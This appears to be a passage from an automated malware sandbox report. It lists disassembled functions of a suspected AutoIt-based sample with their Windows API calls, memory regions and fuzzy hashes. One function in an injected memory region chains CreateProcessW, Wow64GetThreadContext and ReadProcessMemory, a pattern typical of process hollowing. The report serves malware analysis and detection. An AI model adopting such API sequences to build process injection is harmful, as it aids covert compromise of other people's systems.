                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: 718c693b5f9169a48f42dc08829addb75543d674ccd67bdaf7d670ab1e3337c1
                    • Instruction ID: f3d6004d4ecc7e463d1a6ee4242eed9f3ead08c1dc74d2dbe8bc22abb264390f
                    • Opcode Fuzzy Hash: 718c693b5f9169a48f42dc08829addb75543d674ccd67bdaf7d670ab1e3337c1
                    • Instruction Fuzzy Hash: B5019671904258AEDB28D7A8C85ABEE7BF8DB15301F00859AE656D2181E5B9A6048760
                    Function 007B9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 007B9B82
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007B9B99
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: 060e5463cd69482f800d517db648ea7394afb14f003e869021e212030c755142
                    • Instruction ID: 49fd0c968475d0075aa56b949f5e8a51e39a2aed699ced8ae587441542ee3ba2
                    • Opcode Fuzzy Hash: 060e5463cd69482f800d517db648ea7394afb14f003e869021e212030c755142
                    • Instruction Fuzzy Hash: 93D05E7954130DABDB60AB90DC0EF9A773CF704700F0082A2FE65D11A1DEB865988B99
                    Function 007CCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a9a48b366fdb3534b659ec4f69353e95d34beb7cbb69799a9d21069289ec451
                    • Instruction ID: d99be66d428c91cebc975c308a1c8eab63c2826c2fddf02a802750a1775c3b4c
                    • Opcode Fuzzy Hash: 1a9a48b366fdb3534b659ec4f69353e95d34beb7cbb69799a9d21069289ec451
                    • Instruction Fuzzy Hash: BBF11671608305DFCB24DF28C484A6ABBE5BF88314F14892EF89A9B251D775ED45CF82
                    Function 007543DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00754401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007544A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007544C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: 6f91ddc0e08d620adfebf211ff9fc8ccff6498a4e4b55ccab5da65a16810a297
                    • Instruction ID: ee4735bc3dc9e65beef0d3021d4126705b480647b39e67d05511d9ae29cb0c4d
                    • Opcode Fuzzy Hash: 6f91ddc0e08d620adfebf211ff9fc8ccff6498a4e4b55ccab5da65a16810a297
                    • Instruction Fuzzy Hash: 3F3150705057419FD720DF64D884BDBBBF8BB48309F00492EE99A83251E7B96988CB92
                    Function 0077594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00775963
                      • Part of subcall function 0077A3AB: __NMSG_WRITE.LIBCMT ref: 0077A3D2
                      • Part of subcall function 0077A3AB: __NMSG_WRITE.LIBCMT ref: 0077A3DC
                    • __NMSG_WRITE.LIBCMT ref: 0077596A
                      • Part of subcall function 0077A408: GetModuleFileNameW.KERNEL32(00000000,008143BA,00000104,?,00000001,00000000), ref: 0077A49A
                      • Part of subcall function 0077A408: ___crtMessageBoxW.LIBCMT ref: 0077A548
                      • Part of subcall function 007732DF: ___crtCorExitProcess.LIBCMT ref: 007732E5
                      • Part of subcall function 007732DF: ExitProcess.KERNEL32 ref: 007732EE
                      • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                    • RtlAllocateHeap.NTDLL(011D0000,00000000,00000001,00000000,?,?,?,00771013,?), ref: 0077598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: 2561a4b6d56e2452bedc5e30313994bece53bff15843115ae8b5408d757b330a
                    • Instruction ID: e9b7bae599daa65208a9d3d7e3e1e866ab85026df09d1a90e419a76f8fc80e96
                    • Opcode Fuzzy Hash: 2561a4b6d56e2452bedc5e30313994bece53bff15843115ae8b5408d757b330a
                    • Instruction Fuzzy Hash: 8C01D631341B15EEEE212B34D84966E72489F427F0F10C136F60D9B1C1DEBDAD014A61
                    Function 007B9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007B97D2,?,?,?,?,?,00000004), ref: 007B9B45
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007B97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007B9B5B
                    • CloseHandle.KERNEL32(00000000,?,007B97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007B9B62
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: d09704b7b4620657d6702d4d7288206e880809aa1bb2633dc88b7c8b82db4aa9
                    • Instruction ID: 230612e940626c119abb87b8ce971df7adb26fe81a4694d47f44c617cd103778
                    • Opcode Fuzzy Hash: d09704b7b4620657d6702d4d7288206e880809aa1bb2633dc88b7c8b82db4aa9
                    • Instruction Fuzzy Hash: 3EE08632181228B7D7211B54EC09FCA7F28AB05761F148121FB25A90E087B62611979C
                    Function 007B8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 007B8FA5
                      • Part of subcall function 00772F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00779C64), ref: 00772FA9
                      • Part of subcall function 00772F95: GetLastError.KERNEL32(00000000,?,00779C64), ref: 00772FBB
                    • _free.LIBCMT ref: 007B8FB6
                    • _free.LIBCMT ref: 007B8FC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction ID: c50d2a78a5e9f5e0753d9b1935cc7dba445f7a4b2aa1aa02466b312dd18cf473
                    • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction Fuzzy Hash: FEE012A16097018ECE64A578AD44BF357FE5F48390B28081DF45DDB143DE2CE842C524
                    Function 0075AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: cd435eb8f68300c35c75d53ff589e765b9d98affb5b7ca003ee3903419106307
                    • Instruction ID: 6c4f6eb335bada358de1d23111f6e1a57b9bae56795c8357a5b0c51708d0b963
                    • Opcode Fuzzy Hash: cd435eb8f68300c35c75d53ff589e765b9d98affb5b7ca003ee3903419106307
                    • Instruction Fuzzy Hash: 4A223870608341DFCB24DF14C495AAABBF1BF45301F14896DE89A8B262D779ED49CB82
                    Function 0075492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    • IsThemeActive.UXTHEME ref: 00754992
                      • Part of subcall function 007735AC: __lock.LIBCMT ref: 007735B2
                      • Part of subcall function 007735AC: DecodePointer.KERNEL32(00000001,?,007549A7,007A81BC), ref: 007735BE
                      • Part of subcall function 007735AC: EncodePointer.KERNEL32(?,?,007549A7,007A81BC), ref: 007735C9
                      • Part of subcall function 00754A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00754A73
                      • Part of subcall function 00754A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00754A88
                      • Part of subcall function 00753B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00753B7A
                      • Part of subcall function 00753B4C: IsDebuggerPresent.KERNEL32 ref: 00753B8C
                      • Part of subcall function 00753B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008162F8,008162E0,?,?), ref: 00753BFD
                      • Part of subcall function 00753B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00753C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007549D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 1438897964-0
                    • Opcode ID: 0933d6fb93b306a524e0ec145e58d49a26b338d4e6b37b904d9ab28e84ff69c2
                    • Instruction ID: 4f9f56280749ffc7a747f4dd221ffe97c104dcb8751f6bfa50490cdbc9e84824
                    • Opcode Fuzzy Hash: 0933d6fb93b306a524e0ec145e58d49a26b338d4e6b37b904d9ab28e84ff69c2
                    • Instruction Fuzzy Hash: 0C116A71908311DBC700EF28E80998ABBF8FF94750F00851EF485932A1EBB89659CB96
                    Function 00755DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00755981,?,?,?,?), ref: 00755E27
                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00755981,?,?,?,?), ref: 0078E19C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: d110010b174a26d79620699818420b85f547a281f2d47918740791de31ba49bb
                    • Instruction ID: d3b9b94ec14e03740beae477e4e3fb684dbc911bc7da7100379577a51a2cfbe1
                    • Opcode Fuzzy Hash: d110010b174a26d79620699818420b85f547a281f2d47918740791de31ba49bb
                    • Instruction Fuzzy Hash: D4018070284608BEF3241E24CC9AFA63B9CAB01769F108319FEE55A1E0C6F91E498B54
                    Function 00770FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0077594C: __FF_MSGBANNER.LIBCMT ref: 00775963
                      • Part of subcall function 0077594C: __NMSG_WRITE.LIBCMT ref: 0077596A
                      • Part of subcall function 0077594C: RtlAllocateHeap.NTDLL(011D0000,00000000,00000001,00000000,?,?,?,00771013,?), ref: 0077598F
                    • std::exception::exception.LIBCMT ref: 0077102C
                    • __CxxThrowException@8.LIBCMT ref: 00771041
                      • Part of subcall function 007787DB: RaiseException.KERNEL32(?,?,?,0080BAF8,00000000,?,?,?,?,00771046,?,0080BAF8,?,00000001), ref: 00778830
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: fbc25c1c049cf44e074c01901825335bb3a7a3f9eab8a17c79df87ed2062e208
                    • Instruction ID: f1b351b1f61827455b60c9183e161a1122bf4a6394c303415d1fe05429245982
                    • Opcode Fuzzy Hash: fbc25c1c049cf44e074c01901825335bb3a7a3f9eab8a17c79df87ed2062e208
                    • Instruction Fuzzy Hash: 2BF0F43464025DE6CF20EA9CEC09ADF77AC9F003D0F608425F90C96182EFF89A91D2E1
                    Function 0077582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: ae9d1fcc397d940a832e24e3c1a71191e0f5945b72ddaa5f71021c6cdadb3a05
                    • Instruction ID: 337e3d9dc1f240713db62682d8731da08466e836d484096f5415b2ae5a8b6435
                    • Opcode Fuzzy Hash: ae9d1fcc397d940a832e24e3c1a71191e0f5945b72ddaa5f71021c6cdadb3a05
                    • Instruction Fuzzy Hash: F6018871C00604EBCF51AFA5CC0999E7B61BF403E0F14C215F81C5A1A1DB798651DB92
                    Function 007755D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                    • __lock_file.LIBCMT ref: 0077561B
                      • Part of subcall function 00776E4E: __lock.LIBCMT ref: 00776E71
                    • __fclose_nolock.LIBCMT ref: 00775626
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: 2c868f2c19c4a6da4ce27f667804054267d1de3733e9b7ca0fa9b65a6cbd2d02
                    • Instruction ID: 76dd5afdacce1878262677010bc6db30a3c0f12977f1968636e21aa4529c5bfa
                    • Opcode Fuzzy Hash: 2c868f2c19c4a6da4ce27f667804054267d1de3733e9b7ca0fa9b65a6cbd2d02
                    • Instruction Fuzzy Hash: EAF09071941A04DADF60AB75C80EB6E76A16F41BF4F55C209A42CEB1C1CFBC8A019B56
                    Function 036C129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 036C1A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036C1AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036C1B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.2110433162.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_36c0000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction ID: 737e8f489b2f2c9bab290c33d567de15d444bc1bce531f402c63faf05a0f452b
                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction Fuzzy Hash: B512BD24E24658C6EB24DF64D8507DEB232EF69300F1090ED910DEB7A5E77A4E81CF5A
                    Function 00762123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9cf93666c6ac64ca7b2208de7103c5a0d21116eddf42269dc58bd01122f69077
                    • Instruction ID: 858446639d004ed61faec888caee554979b7eae05f7e9826a56cf902d90ba0bb
                    • Opcode Fuzzy Hash: 9cf93666c6ac64ca7b2208de7103c5a0d21116eddf42269dc58bd01122f69077
                    • Instruction Fuzzy Hash: 69518E34600604EFCF14EB64C9A9EAE77A5AF85720F148168FD06AB292DB38FD05CB51
                    Function 00755C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00755CF6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: b249ec2433366d9a5810b0daa68c535683cf6370932a67d472bc29e55d451869
                    • Instruction ID: 21ee718bb01a4b1efc78da3efe7aa0c90993f828a43c905c5345fbb7758c5c48
                    • Opcode Fuzzy Hash: b249ec2433366d9a5810b0daa68c535683cf6370932a67d472bc29e55d451869
                    • Instruction Fuzzy Hash: A2315A31A00B0AABCB18DF6DC494AADB7B1FF48311F148629EC1993710D7B5A964DBA0
                    Function 007900D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 4913c7dd020385968957f03bc723a9c127e7a34ddaddf0bef54eb49a268c8a84
                    • Instruction ID: 2d6016226db2d7c42b3aef0ae0bb860d1275a85374c76c71ca09a4083192a84e
                    • Opcode Fuzzy Hash: 4913c7dd020385968957f03bc723a9c127e7a34ddaddf0bef54eb49a268c8a84
                    • Instruction Fuzzy Hash: 02410874604341DFDB14DF14C488B5ABBE1BF45318F1989ACE9994B362C379EC49CB52
                    Function 007579AB Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                    • Instruction ID: 57379e327b59c4d1cf7259446cf266e253d5d5e4f7985f47f9c34cc9b5370c34
                    • Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                    • Instruction Fuzzy Hash: C511E431208205AFD718DF2CD485CAEB3A8EF45360724851AED19DB290DB76AC15CBD0
